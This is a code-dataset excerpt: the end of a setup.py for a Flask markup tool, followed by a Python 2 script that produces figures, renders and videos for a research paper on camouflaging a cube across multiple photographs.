name='Workbench',
version='0.1.1',
description='Timesaver for psd2html (markup)',
long_description=readme,
author='Bohdan Khorolets',
author_email='[email protected]',
url='https://github.com/khorolets/workbench',
packages=find_packages(),
entry_points={
'console_scripts': [
'workbench = workbench.__init__:manager.run',
],
},
install_requires=list(filter(None, [
'flask',
'flask-script',
'elizabeth',
])),
)
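# Note (not part of the original file): the console_scripts entry point above means that
# installing the package (e.g. with `pip install .`) is expected to create a `workbench`
# command that invokes the Flask-Script manager's run() defined in workbench/__init__.py.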
|
py | 1a3043bb509bd9f486ffad888b2bad22b07531b8 | import util as ut, glob, os, dset, box, img as ig, experiments, numpy as np, scipy.io, camo, copy, rotation, mvg, imtable, iputil as ip, pylab, planefit, glob, tour
# Code for generating the figures/videos in the paper and the talk
RESDIR_LOO = '/data/scratch/aho/camo-results/camera-ready-loo/loo'
RESDIR_NOLOO = '/data/scratch/aho/camo-results/camera-ready-noloo/noloo'
STATS_PATH = '/data/vision/billf/camo/camo/nondetect/results/stats/stats.pk'
ALL_SCENES = experiments.classic_scenes + experiments.new_scenes
def make_path(loo_s, alg_name, scene = ''):
assert loo_s in ('loo', 'noloo')
base = RESDIR_LOO if loo_s == 'loo' else RESDIR_NOLOO
return ut.pjoin(base, idx_from_alg(alg_name), scene)
def idx_from_alg(alg_name):
return str(METHODS.index(alg_name)+1)
def path_from_scene(scene):
return ut.pjoin('../data', scene)
# duplicated from 4-8 in experiments.py
METHODS = ['uniform', 'mean', 'random', 'greedy', 'occlusion', 'stable-robust', 'occlusion-wide', 'interior-wide', 'occlusion-wide-nostable']
tested_scenes = experiments.classic_scenes + experiments.new_scenes
def make_teaser():
name = 'bookshelf-real'
in_dir = make_path('noloo', 'interior-wide', name)
out_dir = '../results/teaser-bookshelf-interior'
ut.mkdir(out_dir)
print in_dir
for in_fname in sorted(glob.glob(ut.pjoin(in_dir, '*.jpg'))):
base = os.path.split(in_fname)[1]
out_fname = ut.pjoin(out_dir, base.replace('.jpg', '.pdf'))
assert not os.path.exists(out_fname)
print in_fname, out_fname
os.system('convert %s %s' % (in_fname, out_fname))
def make_scene_fig(nscenes = 20, ims_per_scene = 2, todo = ['fig']):
with ut.constant_seed(0):
method = 'occlusion-wide'
# random sample
#all_scenes = sorted(glob.glob(make_path('noloo', method, '*')))
#scenes = ut.sample_at_most(all_scenes, nscenes)
#already_in_paper = 'couch3-real bookshelf-real'.split()
already_in_paper = ''.split()
ok_scenes = []
# these mess up the diagram
for scene in tested_scenes:
shape = dset.Scan(path_from_scene(scene)).full_shape
ratio = (float(shape[1]) / float(shape[0]))
if abs(ratio - 1.5 ) >= 0.01 or (scene in already_in_paper):
print 'skipping', scene, 'bad aspect ratio', ratio, 'or already in paper'
else:
ok_scenes.append(scene)
#scenes = ut.sample_at_most(ut.shuffled(scenes), nscenes)
scenes = ut.sample_at_most(ut.shuffled(ok_scenes), nscenes)
print '\n'.join(scenes)
if 'show' in todo:
table = []
for scene in scenes:
print scene
scan = dset.Scan(path_from_scene(scene))
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))
texel_colors = ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0]
row = [scene]
assert ims_per_scene == 2
# show frames from this result
# choose two that aren't used in the solution and which are representative viewpoints
# this is nontrivial to do programmatically; pick them by hand
# include in the UI a way to verify that the same image is not being used
# note that due to the sampling some views might be of faces that have no label (check this!)
for frame in scan.frames:
row += [frame, ('cycle', [mesh.render(scan, frame, texel_colors), scan.im(frame)])]
table.append(row)
ig.show(table)
if 'fig' in todo:
frame_choices = \
{'mit-31' : 11,
'mit-29' : 0,
'disrupt-8' : 12,
'mit-12': 15,
'patio2-real' : 1,
'walden-tree1' : 9,
'mit-12' : 19,
'mit-21' : 8,
'charlottesville-6' : 6,
'walden-log' : 6,
'charlottesville-2' : 8,
'charlottesville-9' : 6,
'charlottesville-1' : 7,
'disrupt-6' : 0,
'mit-20' : 3,
'mit-14': 13,
'walden-tree3' : 0,
'mit-6' : 6,
'mit-1' : 8,
'mit-5' : 16,
'couch3-real' : 6,
'bookshelf-real' : 3,
'charlottesville-7' : 9,
'mit-26' : 8,
'mit-28' : 13,
'mit-13' : 7,
'disrupt-11' : 7,
'couch5-real' : 2,
'walden-brush2' : 0,
'mit-9' : 0,
'mit-27' : 0,
'charlottesville-3' : 1,
'mit-37' : 4,
'mit-16' : 13,
}
out_base = '../results/scene-fig'
#assert not os.path.exists(out_base)
ut.mkdir(out_base)
scene_acc = ut.load(STATS_PATH)
scenes_by_easiness = sorted(scenes, key = lambda x : -np.mean(scene_acc[x, idx_from_alg(method)]))
for si, scene in enumerate(scenes_by_easiness):
print scene, np.mean(scene_acc[scene, idx_from_alg(method)])
# easier than deriving the image number from the output files
scan = dset.Scan(path_from_scene(scene))
texel_colors = ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0]
frame = frame_choices[scene]
#out_path = ut.pjoin(out_base, 'scene-%d.pdf' % (1+si))
out_path = ut.pjoin(out_base, 'scene-%d.png' % (1+si))
#assert not os.path.exists(out_path)
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))
ig.save(out_path, mesh.render(scan, frame, texel_colors))
def make_multiview_fig(n = None):
method = 'occlusion-wide'
scene_choices = ['mit-1', 'charlottesville-1', 'disrupt-11']
frame_choices = {'mit-1' : [0, 3, 7, 10], 'charlottesville-1' : [0, 2, 5, 8], 'disrupt-11' : [0, 4, 7, 10]}
out_base = '../results/multiview-fig'
#assert not os.path.exists(out_base)
ut.mkdir(out_base)
for si, scene in enumerate(scene_choices[:n]):
scan = dset.Scan(path_from_scene(scene))
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))
frames = frame_choices[scene]
for fi, frame in enumerate(frames):
out_path = ut.pjoin(out_base, 'scene-%d-%d.png' % (1+si, 1+fi))
#assert not os.path.exists(out_path)
texel_colors = ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0]
#ig.save(out_path, mesh.render(scan, frame, texel_colors))
#ig.save(out_path, render_cube(scan.path, mesh, texel_colors, frame, 200, outline = True, frame_using_cube = True))
if scene == 'mit-1':
occ_thresh = 1.25#1.8
else:
occ_thresh = None
if scene == 'charlottesville-1':
occ_thresh = 2.5
d_sc = 1.2
else:
d_sc = 1.
ig.save(out_path, render_cube(scan.path, mesh, texel_colors, frame, 200, outline = True, frame_using_cube = True, occ_thresh = occ_thresh, dim_sc = d_sc))
# def dilate_occ(scan, mesh, frame):
# occ = camo.occlusion_texels(scan, mesh, frame, thresh = 1.5, only_border = True)
# as_juv = mesh.index_as_juv(occ).copy()
# for j in xrange(as_juv.shape[0]):
# #dist, ind = scipy.ndimage.distance_transform_edt(1 - as_juv[j], return_indices = True)
# if np.any(as_juv[j]):
# dist, ind = scipy.ndimage.distance_transform_bf(1 - as_juv[j], metric = 'taxicab', return_indices = True)
# dist[ind[0] < 0] = 1e10
# as_juv[j, dist <= 10] = True
# return np.logical_and(mesh.texel_visible(scan, frame), mesh.index_as_flat(as_juv))
def clean_occ(scan, mesh, frame):
occ = camo.occlusion_texels(scan, mesh, frame, thresh = 1.5, only_border = True)
as_juv = mesh.index_as_juv(occ).copy()
for j in xrange(as_juv.shape[0]):
w, h = as_juv.shape[1:]
for u, v in [(0, range(h)),
(range(w), 0),
(range(w), -1),
(-1, range(h))]:
as_juv[j, u, v] = (np.mean(as_juv[j, u, v]) >= 0.5)
#dist, ind = scipy.ndimage.distance_transform_edt(1 - as_juv[j], return_indices = True)
# if np.any(as_juv[j]):
# dist, ind = scipy.ndimage.distance_transform_bf(1 - as_juv[j], metric = 'taxicab', return_indices = True)
# dist[ind[0] < 0] = 1e10
# as_juv[j, dist <= 10] = True
return np.logical_and(mesh.texel_visible(scan, frame), mesh.index_as_flat(as_juv))
def scan_fullres(fr, path):
if fr:
return dset.Scan(path, max_dim = None)
else:
return dset.Scan(path)
def occlusion_mask(scan, mesh, frame, thresh = 2., outline = False):
mask = box.mask(scan, mesh, frame)
#D = scipy.ndimage.distance_transform_edt(mask)
D = scipy.ndimage.distance_transform_edt(mask)
return D <= thresh, D
#return np.logical_and(mask, D <= thresh)
def mark_occlusion_texels(tc, scan, mesh, frame, thresh, mesh_occ_mask = None, p = 1):
tc = tc.copy()
mask = box.mask(scan, mesh, frame)
if mesh_occ_mask is not None:
mask = (mask & -mesh_occ_mask)
D = scipy.ndimage.distance_transform_edt(mask)
#occ_mask = np.array(occlusion_mask(scan, mesh, frame, thresh = thresh), 'd')
occ_mask = np.array(D, 'd')
vis = mesh.texel_visible(scan, frame)
proj = scan.project(frame, mesh.texel_pts)
proj = np.array(np.round(proj), 'l')
occ = np.zeros(mesh.ntexels, 'd')
occ[vis] = occ_mask[proj[vis, 1], proj[vis, 0]]
w = np.zeros_like(occ)
w[occ < thresh] = p#1
# scale the texels that are not totally on the boundary
ok = (thresh <= occ) & (occ < 1+thresh)
# anti-alias and (optionally) weight
w[ok] = p*((1+thresh) - occ[ok])
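    # Illustrative weights (comment added for clarity): with thresh = 2 and p = 1, a texel
    # projecting 1.5 px inside the mask (i.e. near its boundary) gets w = 1, one at 2.4 px
    # gets w = 0.6, and anything at 3 px or more keeps w = 0, a soft falloff at the border.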
assert np.all((0 <= w) & (w <= 1))
tc = tc*(1-w[:, np.newaxis]) + 255*w[:, np.newaxis]
return tc
def render_cube(scene, mesh, texel_colors, frame, crop_size, fullres = False, outline = False,
frame_using_cube = False, occ_thresh = None, draw_boundaries = False, im = None, use_fr = True, dim_sc = 1., show_cube = True):
scan = scan_fullres(fullres, scene)
if im is None:
im_input = scan.im(frame)
else:
im_input = im
tc = texel_colors.copy()
mask = box.mask(scan, mesh, frame)
ys, xs = np.nonzero(mask)
cx, cy = map(int, np.mean(np.array([xs, ys]), axis = 1))
if frame_using_cube:
box_rect = ut.bbox2d(np.array([xs, ys]).T)
d = int(round(dim_sc * min(4*max(box_rect[2:]), min(scan.im(0).shape[:2]) - 1)))
rect = ut.rect_centered_at(cx, cy, d, d)
rect = ut.shift_in_bounds(scan.im(0).shape, rect)
scale = float(crop_size)/rect[2]
print box_rect, rect, scale
else:
rect = None
scale = 1.
# if not show_cube:
# im = scan.im(frame)
# rect = ut.rect_centered_at(cx, cy, crop_size, crop_size)
# crop_size /= scan_fullres(False, scan.path).scale
# return ig.sub_img(im, ut.rect_im_intersect(im, rect))
if outline:
if rect is not None:
assert rect[2] == rect[3]
#scan_fr = scan_fullres(True, scene)
scan_fr = scan_fullres(use_fr, scene)
print 'scale', scale
if occ_thresh is None:
occ_thresh = 2.
occ_thresh /= scale
# occ = camo.occlusion_texels(scan_fr, mesh, frame, thresh = occ_thresh, only_border = False)
# tc[occ] = 255
tc = mark_occlusion_texels(tc, scan_fr, mesh, frame, thresh = occ_thresh)
im_up = ig.resize(im_input, scan_fr.im(frame).shape)
#im = ig.resize(mesh.render(scan_fr, frame, tc, im = im_up), scan.im(frame).shape)
im_fr = mesh.render(scan_fr, frame, tc, im = im_up)
im = ig.resize(im_fr, scan.im(frame).shape)
if not show_cube:
im = scan.im(frame)
#ig.show([im_fr, im])
#assert im.shape[0] == im.shape[1]
else:
if show_cube:
im = mesh.render(scan, frame, tc)
else:
im = scan.im(frame)
if rect is not None:
if draw_boundaries:
return ig.draw_rects(im, [rect])
else:
return ig.sub_img(im, rect)
if fullres:
crop_size /= scan_fullres(False, scan.path).scale
#sc = (crop_size/2.)/float(box_rect[2])
elif crop_size is None:
return im
else:
rect = ut.rect_centered_at(cx, cy, crop_size, crop_size)
return ig.sub_img(im, ut.rect_im_intersect(im, rect))
def make_real_cube():
scene = 'bookshelf-real'
method = 'interior-wide'
scan = dset.Scan(path_from_scene(scene))
#texel_colors = camo.to_color_space_2d(ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0])
if 0:
print 'hires'
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), texsize = 512)
scan = dset.Scan(path_from_scene(scene), max_dim = 2000)
texel_colors = camo.camo(scan, mesh, ut.Struct(method = 'interior-wide'))
ut.save('../results/real-interior.pk', texel_colors)
ut.toplevel_locals()
elif 1:
# upgrade to larger texel size; bigger images
texel_colors0, results0, labels0 = ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][:3]
mesh0 = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), texsize = 256)
texsize = 1024
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), texsize = texsize)
geom = camo.Geom(scan, mesh)
scan = dset.Scan(path_from_scene(scene), max_dim = 2000)
label_color, label_valid = camo.label_colors(scan, mesh, geom, labels0, invisible_colors = True)
as_juv0 = mesh0.index_as_juv(results0).copy()
as_juv1 = mesh.index_as_juv(np.zeros(mesh.ntexels)).copy()
for j in xrange(as_juv0.shape[0]):
as_juv1[j] = ig.resize(as_juv0[j], as_juv1[j].shape[:2], order = 0, hires = False)
results1 = np.array(mesh.index_as_flat(as_juv1), 'l')
texel_colors = camo.from_color_space_2d(label_color[range(len(results1)), results1])
#texel_colors = label_color[range(len(results1)), results1]
ut.toplevel_locals()
elif 0:
texel_colors = ut.load('../results/real-interior.pk')[0]
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), texsize = 512)
else:
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))
texel_colors = ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0]
texel_colors = camo.to_color_space_2d(texel_colors)
texel_colors = mesh.index_as_juv(texel_colors)
out_path = '../results/real/colors.mat'
scipy.io.savemat(out_path, {'texel_colors' : texel_colors})
import matlab
matlab.matlab_cmd('/data/vision/billf/camo/camo', 'load_real_cube')
def make_printable_pattern(scene_path, mesh0, texel_colors0, results0, labels0, geom = None):
#texel_colors = camo.to_color_space_2d(ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0])
# upgrade to larger texel size; bigger images
#texsize = 1024
texsize = 4096
#scan = dset.Scan(scene_path, max_dim = 2000)
scan = dset.Scan(scene_path, max_dim = None)
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), texsize = texsize)
as_juv0 = mesh0.index_as_juv(results0).copy()
as_juv1 = mesh.index_as_juv(np.zeros(mesh.ntexels)).copy()
for j in xrange(as_juv0.shape[0]):
as_juv1[j] = ig.resize(as_juv0[j], as_juv1[j].shape[:2], order = 0, hires = False)
results1 = np.array(mesh.index_as_flat(as_juv1), 'l')
labels = np.array(labels0, 'double')
labels[:, 1:] *= scan.scale/dset.Scan(scene_path).scale
print labels
texel_colors = np.zeros((mesh.ntexels, 3))
if geom is None:
geom = camo.Geom(scan, mesh)
print len(np.unique(results1))
for label in np.unique(results1):
print 'trying', label
label = int(label)
frame = int(labels[label, 0])
valid, colors = camo.project_texels(scan, frame, mesh, scan.im(frame), geom, labels[label, 1:])
ok = results1 == label
texel_colors[ok] = colors[ok]
#texel_colors = label_color[range(len(results1)), results1]
texel_colors_rgb = texel_colors.copy()
ut.toplevel_locals()
#texel_colors = camo.to_color_space_2d(texel_colors)
texel_colors = mesh.index_as_juv(texel_colors)
out_path = '../results/real/colors.mat'
scipy.io.savemat(out_path, {'texel_colors' : texel_colors, 'texel_colors_rgb' : texel_colors_rgb})
# import matlab
# matlab.matlab_cmd('/data/vision/billf/camo/camo', 'load_real_cube')
def make_rescomp_fig(n = None):
table = []
# index frames to be consistent w/ amt results
comparisons = [
('mit-20', 3, ['occlusion-wide', 'interior-wide']),
('disrupt-14', 4, ['occlusion-wide', 'random']),
('disrupt-14', 5, ['occlusion-wide', 'random']),
('disrupt-14', 3, ['occlusion-wide', 'random']),
]
#scene_acc = ut.load(STATS_PATH)
#out_dir = '../results/qual-compare'
out_dir = '../results/qual-compare2'
ut.mkdir(out_dir)
num = 0
for scene, loo_idx, methods in comparisons:
scan = scan_fullres(False, path_from_scene(scene))
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))
table.append([])
for method in methods:
data = ut.load(ut.pjoin(make_path('loo', method, scene), 'data_%03d.pk' % loo_idx))
texel_colors = data['ret'][0]
loo_frame = scan.idx.index(data['pr'].loo_frame_idx)
im = render_cube(scan.path, mesh, texel_colors, loo_frame, 200, outline = True, frame_using_cube = True)
assert im.shape[0] == im.shape[1]
table[-1] += [method, im]
#table[-1] += [method, render_cube(scan.path, mesh, texel_colors, loo_frame, 200, outline = False)]
ig.save(ut.pjoin(out_dir, 'result-%03d.pdf' % num), im)
ig.save(ut.pjoin(out_dir, 'result-%03d.png' % num), im)
num += 1
ig.show(table)
def count_ims():
total = 0
for scene in ALL_SCENES:
path = make_path('loo', 'interior-wide', scene)
nims = len(glob.glob(path + '/result_*.jpg'))
total += nims
print scene, nims
print 'total images', total, 'scenes', len(ALL_SCENES)
def draw_grid(im, proj, spacing = [-1, 0, 1]):
d = 30.
for x in spacing:
for y in spacing:
if x < 1:
im = ig.draw_lines(im, [proj + d*np.array([x, y])], [proj + d*np.array([x+1, y])], colors = (255, 255, 255))
if y < 1:
im = ig.draw_lines(im, [proj + d*np.array([x, y])], [proj + d*np.array([x, y+1])], colors = (255, 255, 255))
return im
def make_project_fig():
#scene = 'mit-35'
scene = 'mit-37'
path = make_path('noloo', 'interior-wide', scene)
#texel_colors = ut.load(ut.pjoin(path, 'data.pk'))['ret'][0]
scan = dset.Scan(path_from_scene(scene))
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))
scan = dset.Scan(path_from_scene(scene))
frames = range(scan.length)#[scan.length-1] #range(scan.length)[:1]
geom = camo.Geom(scan, mesh)
#texel = mesh.juv2tex[5, 128, 128]
texel = mesh.juv2tex[2, 128, 128]
table = []
for frame in frames:
proj = scan.project(frame, mesh.texel_pts[texel])
im_grid = draw_grid(scan.im(frame), proj)
label_valid, self_colors = camo.project_texels(scan, frame, mesh, im_grid, geom)
im = render_cube(scan.path, mesh, self_colors, frame, 200, fullres = False, outline = True, frame_using_cube = True, occ_thresh = 2., draw_boundaries = True, im = im_grid, use_fr = False)
table.append([im, scan.im(frame)])
#table.append(ig.draw_pts(im, proj))
ig.show(table)
def find_best_algs():
with ut.constant_seed():
scene_acc = ut.load(STATS_PATH)
for scene in ALL_SCENES:
algs = ['greedy', 'interior-wide', 'occlusion-wide']
acc = [np.mean(scene_acc[scene, idx_from_alg(alg)]) for alg in algs]
i = np.argmin(acc)
#print scene, algs[i], acc
yield scene, algs[i]
def label_plane(seq, root = 0, y_flip = True):
scan = dset.Scan(seq, None)
_, _, tracks = dset.read_bundler(scan.bundle_file, scan.full_shape)
pts = np.array([t[0] for t in tracks])
proj = scan.project(root, pts)
pylab.clf()
im_with_pts = ig.draw_pts(scan.im(root), proj, width = 2)
pylab.imshow(im_with_pts)
rect = ut.bbox2d(pylab.ginput(2, timeout = -1))
#rect = (1782.005828476269, 1431.7364696086595, 529.75936719400488, 354.40549542048279)
print rect
ok = ut.land(rect[0] <= proj[:, 0], proj[:, 0] <= rect[0] + rect[2], rect[1] <= proj[:, 1], proj[:, 1] <= rect[1] + rect[3])
pts_in_box = pts[ok]
thresh = pylab.dist(scan.center(root), scan.center(root+1))/50.
plane, _ = planefit.fit_plane_ransac(pts_in_box, thresh)
if plane[1] < 0 and y_flip:
plane *= -1
ins = planefit.plane_inliers(plane, pts, thresh)
pylab.clf()
colors = np.zeros_like(pts)
colors[:, 0] = 255
colors[ins] = (0, 255, 0)
im_ins = ig.draw_pts(scan.im(root), map(ut.itup, proj), map(ut.itup, colors), width = 2)
pylab.clf()
pylab.imshow(im_ins)
print plane
return plane
video_order = ['charlottesville-3', 'bookshelf-real', 'disrupt-11', 'mit-14', 'walden-brush2', 'walden-log', \
'disrupt-8', 'charlottesville-1', 'mit-13', 'disrupt-6']
def test_warp(par = 0, start = 0, end = None):
#scenes = ['bookshelf-real']#['couch3-real', 'bookshelf-real', 'disrupt-11', 'patio2-real', 'mit-1', 'disrupt-8', 'charlottesville-2']
# 5: side
# 4: usually side
# 3: usually side
# 2: usually side
# 1: usually top
# 0: usually bottom
# np.array([-0.9286861 , 0.13738529, -0.34448136, -3.96361632])
scenes = [('disrupt-11', 0, 1, [], []),
('charlottesville-2', 0, 1, [], [(8, 9)]),
('mit-27', 0, 1, [np.array([ -9.06738777e-01, 2.58900135e-03, 4.21684821e-01, 2.93683015e+00])], []),
('disrupt-6', 0, 1, [np.array([ 0.85136312, 0.18874681, -0.48944405, -1.52800028])], []),
('couch3-real', 0, 1, [np.array([-0.60995728, 0.15168697, -0.77778094, -0.88194374])], []),
('couch5-real', 2, 1, [], []),
('disrupt-8', 0, 1, [np.array([-0.92784247, 0.1387372 , -0.34620851, -3.97233358])], []),
('mit-13', 0, -1, [], []),
('mit-20', 0, -1, [], []),
('bookshelf-real', 3, -1, [], [])]
# ('disrupt-6', 0, 1, [], [np.array([ 0.85139516, 0.190946 , -0.48853444, -1.52601666])]),
for x in ALL_SCENES:
if x not in map(ut.fst, scenes):
scenes.append((x, 0, 1, [], []))
#print scenes
#scenes = scenes[start:end]
scenes = sorted(scenes, key = lambda x : (len(video_order) if x[0] not in video_order else video_order.index(x[0]), x[0]))
scenes = scenes[start:end]
ip.reset(par)
scene_alg = dict(find_best_algs())
#scene_names = [y[0] for y in scenes]
for scene, plane_idx, order, other_planes, bad_pairs in scenes:
#texel_colors = ut.load(ut.pjoin(make_path('noloo', 'interior-wide', scene), 'data.pk'))['ret'][0]
alg = 'random' #scene_alg[scene]
texel_colors = ut.load(ut.pjoin(make_path('noloo', alg, scene), 'data.pk'))['ret'][0]
scan = dset.Scan(ut.pjoin('../data/', scene))
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))
#tour.tour(scan, mesh, texel_colors, [0, 1, 2, 3], par = par)
if 0:
if order == 1:
frames = range(scan.length)
else:
frames = list(reversed(range(scan.length)))
else:
frames = sorted(set(map(int, np.linspace(0, scan.length-1, 6))))
if order != 1:
frames = list(reversed(frames))
#print 'before mem usage'
#ut.mem_usage()
print scene, alg
# url = tour.tour(scan, mesh, texel_colors, frames, plane_idx = plane_idx,
# other_planes = other_planes, bad_pairs = bad_pairs,
# outline_start = 0, outline_end = 1, start_wo_outline = True, par = par)
#url = tour.tour(scan, mesh, texel_colors, frames, plane_idx = plane_idx, other_planes = other_planes, bad_pairs = bad_pairs, outline_start = scan.length/2, par = par)
url = tour.tour(scan, mesh, texel_colors, frames, plane_idx = plane_idx, other_planes = other_planes, bad_pairs = bad_pairs, par = par)
f = open('../results/vid-list', 'a')
print >>f, scene, alg, url
f.close()
#print other_planes
#url = tour.tour(scan, mesh, texel_colors, [scan.length-2, scan.length-1], n = 5, plane_idx = plane_idx, other_planes = other_planes, par = par)
#print 'after mem usage'
#ut.mem_usage()
def make_warps():
for i in xrange(len(ALL_SCENES)):
os.system('python -c "import figures; figures.test_warp(par = 1, start = %d, end = %d+1)"' % (i, i))
def collect_warps():
urls = [x.split() for x in ut.lines('../results/vid-results')]
base = '/data/vision/billf/aho-billf/www/tab'
out = ut.make_temp_dir(dir = base)
f = open(ut.pjoin(out, 'index.html'), 'w')
for _, _, url in urls:
last = url.split('/')[-1]
path = os.path.join(base, last)
page_in = open(ut.pjoin(path, 'index.html'), 'r')
f.write(page_in.read() + '\n')
for y in glob.glob(path + '/*.mp4'):
os.system('ln -s %s %s/' % (y, out))
f.close()
os.system('chmod -R a+rwx %s' % out)
print ut.pjoin(imtable.PUBLIC_URL, out.split('/')[-1])
class MeshOcc:
def __init__(self, scan, mask_path = None):
self.scan = scan
self.path = mask_path
def mask(self, frame):
if self.path is None:
return np.zeros(self.scan.im(frame).shape[:2])
else:
fname = os.path.join(self.path, 'masked%d.png'% (frame+1))
if os.path.exists(fname):
mask = np.all(ig.load(fname) == (255, 0, 255), axis = 2)
mask = 255*np.array(mask, 'd')
mask = ig.resize(mask, self.scan.scale, hires = 1)/255.
return mask
else:
return np.zeros(self.scan.im(frame).shape[:2])
def apply_mask(self, im_mesh, im_nomesh, mask):
return im_mesh*(1.-mask[:,:,np.newaxis]) + im_nomesh*mask[:,:,np.newaxis]
def make_videos():
# order = ['charlottesville-3', 'bookshelf-real', 'disrupt-11', 'mit-14', 'walden-brush2', 'mit-27', 'mit-1', 'walden-log', \
# 'mit-5', 'charlottesville-1', 'couch3-real', 'disrupt-6', 'disrupt-8', 'mit-13']
print 'tmp'
video_order = ['charlottesville-3', 'bookshelf-real', 'disrupt-11', 'mit-14', 'walden-log', \
'disrupt-8', 'charlottesville-1', 'mit-13', 'disrupt-6']
vids = []
#urls = dict([(x.split()[0], x.split()[1:]) for x in ut.lines('../results/vid-results')])
urls = dict([(x.split()[0], x.split()[1:]) for x in ut.lines('../results/vid-list')])
base = '/data/vision/billf/aho-billf/www/tab'
for scene in video_order:
alg, url = urls[scene]
print 'alg', alg
last = url.split('/')[-1]
path = os.path.join(base, last)
vids.append(glob.glob(path + '/*.mp4')[0])
print '\n'.join(vids)
ut.write_lines('../results/ffmpeg-vid-list', ['file %s' % s for s in vids])
os.system('ffmpeg -f concat -i ../results/ffmpeg-vid-list -c copy /data/vision/billf/aho-billf/www/camo-vid.mp4')
def make_nondetect_slide(todo, par = False):
ip.reset(par)
scene = 'bookshelf-real'
#scan = dset.Scan(ut.pjoin('../data/', scene))
#scan = dset.Scan(ut.pjoin('../data/', scene), max_dim = 500.)
scan = dset.Scan(ut.pjoin('../data/', scene))
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))
frame = 6
# fix the mesh
lf = frame-1
if 'move' in todo:
# front
plane1 = mesh.face_planes[5]
# side
plane2 = mesh.face_planes[4]
pt1 = mesh.mesh_pts[mesh.face_idx[lf][0]]
pt2 = mesh.mesh_pts[mesh.face_idx[lf][1]]
table = []
# for d in np.linspace(0.8, 0.9, 5):
# for d2 in np.linspace(0.05, 0.5, 5):
for d in [0.85]:
for d2 in [1-0.85]:
#for d3 in [0.1, 0.11, 0.12, 0.15]:
for d3 in [0.15]:
for d4 in [0, 0.025, 0.05, 0.1]:
if 1:
bottom = 1
top = 0
mesh_pts = mesh.mesh_pts.copy()
for i in xrange(scan.length):
if i in (top, bottom):
pts = mesh.mesh_pts[mesh.face_idx[i]].copy()
c = np.mean(pts, axis = 0)
mesh_pts[mesh.face_idx[i]] = c + d*(pts - c)
if i == top:
mesh_pts[mesh.face_idx[i]] -= d2*pylab.dist(pt1, pt2)*mesh.face_planes[i][:3]
#mesh2 = box.Mesh(mesh.face_idx, mesh_pts)
#mesh2 = box.Mesh(mesh.face_idx, mesh_pts - plane[:3]*0.07*pylab.dist(pt1, pt2))
mesh2 = box.Mesh(mesh.face_idx, mesh_pts - plane1[:3]*d3*pylab.dist(pt1, pt2))
mesh2 = box.Mesh(mesh.face_idx, mesh_pts - plane2[:3]*d4*pylab.dist(pt1, pt2))
table.append([d, d2, d3, d4] + [box.draw_faces(mesh2, scan, i) for i in scan.frames])
ig.show(table)
#frame = 3
#lf = 1
lf = frame-1
d = np.linalg.norm(scan.center(lf) - scan.center(lf-1))
pt = scan.center(lf) + 1.05*d*np.array([0., 1., 0]) #0.1*mesh.face_planes[-1][:3]*d
im = scan.im(lf)
#VDIR = mvg.ray_dirs(scan.K(lf), im.shape, scan.R(lf))[im.shape[0]/2, im.shape[1]/2]
texel_colors = np.zeros((mesh.ntexels, 3))
for face in xrange(6):
print np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt), ut.normalized(mesh.face_planes[face][:3])))
texel_colors[mesh.tex2juv[:, 0] == face] = 255*np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt),
ut.normalized(mesh.face_planes[face][:3])))
#texel_colors *= 225/float(np.max(texel_colors))
texel_colors *= 255/float(np.max(texel_colors))
lighting_colors = texel_colors.copy()
ut.save('../results/bookshelf-lighting.pk', lighting_colors)
mesh_occ = MeshOcc(scan, '../results/bookshelf-masks')
def mesh_render(*args, **kwargs):
kwargs['mask'] = mesh_occ.mask(args[1])
return mesh.render(*args, **kwargs)
if 'lighting' in todo:
ig.show([[mesh_render(scan, f, texel_colors), scan.im_with_real(f)] for f in range(scan.length)])
geom = camo.Geom(scan, mesh)
if 'random' in todo:
#for other_frame in xrange(scan.length):
table = []
for frame1 in scan.frames:
_, texel_colors = camo.project_texels(scan, frame1, mesh, scan.im(frame1), geom)
table.append([])
for frame2 in scan.frames:
table[-1] += [frame1, frame2, mesh_render(scan, frame2, texel_colors)]
ig.show(table)
if 'tour-random' in todo:
#frames = [6, 0]
#frames = [6, 2]
frames = [6, 3]
valid, proj_colors = camo.project_texels(scan, frames[0], mesh, scan.im(frames[0]), geom)
texel_colors = lighting_colors.copy()
texel_colors[valid] = proj_colors[valid]
tour.tour(scan, mesh, texel_colors, frames, plane_idx = 3, par = par)
if 'distortion-real' in todo:
src_frame = 2
view_frame = 1
face = 2
scan_tour = dset.Scan(ut.pjoin('../data/', scene))
colors = lighting_colors.copy()
colors[:] = 200
colors[mesh.tex2juv[:, :, 0] == face] = (0, 128, 0)
table = []
valid, proj_colors = camo.project_texels(scan_tour, src_frame, mesh, scan_tour.im(src_frame), geom)
colors[valid] = proj_colors
table.append(mesh_render(scan_tour, view_frame, colors))
ig.show(table)
if 'distortion-synthetic' in todo:
proj_frame = 2
view_frame = 1
im = scan.im(proj_frame).copy()
mask = box.mask(scan, mesh, proj_frame)
#pattern = ig.load('/data/vision/billf/camo/camo/nondetect/results/textures/zebra-stripes-vector/zebra-stripes.png')
#pattern = ig.load('/data/vision/billf/camo/camo/nondetect/results/textures/checkers/Checkerboard_pattern.png')
pattern = ig.load('/data/vision/billf/camo/camo/nondetect/results/textures/checkers/Checkerboard_pattern.jpg')
